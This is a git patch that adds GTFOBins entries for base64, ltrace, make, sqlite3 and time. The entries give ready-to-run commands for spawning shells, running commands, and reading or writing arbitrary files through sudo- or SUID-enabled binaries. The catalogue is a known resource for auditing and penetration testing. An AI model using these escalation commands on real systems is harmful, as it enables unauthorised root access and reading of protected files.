From 5fa7efbc1c23b11b8c5bc811357a5bd830eafa99 Mon Sep 17 00:00:00 2001
From: Dov Murik <dov.murik@gmail.com>
Date: Mon, 4 Jun 2018 10:21:53 +0000
Subject: [PATCH] Add base64, ltrace, make, sqlite3, time

---
 _gtfobins/base64.md  | 15 +++++++++++++++
 _gtfobins/ltrace.md  |  7 +++++++
 _gtfobins/make.md    | 23 +++++++++++++++++++++++
 _gtfobins/sqlite3.md | 27 +++++++++++++++++++++++++++
 _gtfobins/time.md    | 12 ++++++++++++
 5 files changed, 84 insertions(+)
 create mode 100644 _gtfobins/base64.md
 create mode 100644 _gtfobins/ltrace.md
 create mode 100644 _gtfobins/make.md
 create mode 100644 _gtfobins/sqlite3.md
 create mode 100644 _gtfobins/time.md

diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
new file mode 100644
index 0000000..02e4f62
--- /dev/null
+++ b/_gtfobins/base64.md
@@ -0,0 +1,15 @@
+---
+functions:
+  sudo-enabled:
+    - code: |
+        LFILE=file_to_read
+        sudo base64 "$LFILE" | base64 -d
+  suid-enabled:
+    - code: |
+        LFILE=file_to_read
+        ./base64 "$LFILE" | base64 -d
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        base64 "$LFILE" | base64 -d
+---
diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
new file mode 100644
index 0000000..f7b420b
--- /dev/null
+++ b/_gtfobins/ltrace.md
@@ -0,0 +1,7 @@
+---
+functions:
+  execute-interactive:
+    - code: ltrace -b -L /bin/sh
+  sudo-enabled:
+    - code: sudo ltrace -b -L /bin/sh
+---
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
new file mode 100644
index 0000000..fb38728
--- /dev/null
+++ b/_gtfobins/make.md
@@ -0,0 +1,23 @@
+---
+functions:
+  execute-interactive:
+    - code: |
+        COMMAND='/bin/sh 1>&2'
+        make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  execute-non-interactive:
+    - code: |
+        COMMAND=/usr/bin/id
+        make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  sudo-enabled:
+    - code: |
+        COMMAND=/usr/bin/id
+        sudo make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  suid-enabled:
+    - code: |
+        COMMAND=/usr/bin/id
+        ./make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        make -s --eval="a := \$(file >$LFILE,data)" --eval='all:'
+---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
new file mode 100644
index 0000000..6fa89ae
--- /dev/null
+++ b/_gtfobins/sqlite3.md
@@ -0,0 +1,27 @@
+---
+functions:
+  sudo-enabled:
+    - code: |
+        LFILE=file_to_read
+        sudo sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+  suid-enabled:
+    - code: |
+        LFILE=file_to_read
+        ./sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
+---
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
new file mode 100644
index 0000000..7530795
--- /dev/null
+++ b/_gtfobins/time.md
@@ -0,0 +1,12 @@
+---
+description: |
+  Note that the shell might have its own builtin time implementation, which may
+  behave differently than /usr/bin/time.
+functions:
+  execute-interactive:
+    - code: /usr/bin/time /bin/sh
+  sudo-enabled:
+    - code: sudo /usr/bin/time /bin/sh
+  suid-enabled:
+    - code: ./time /bin/sh -p
+---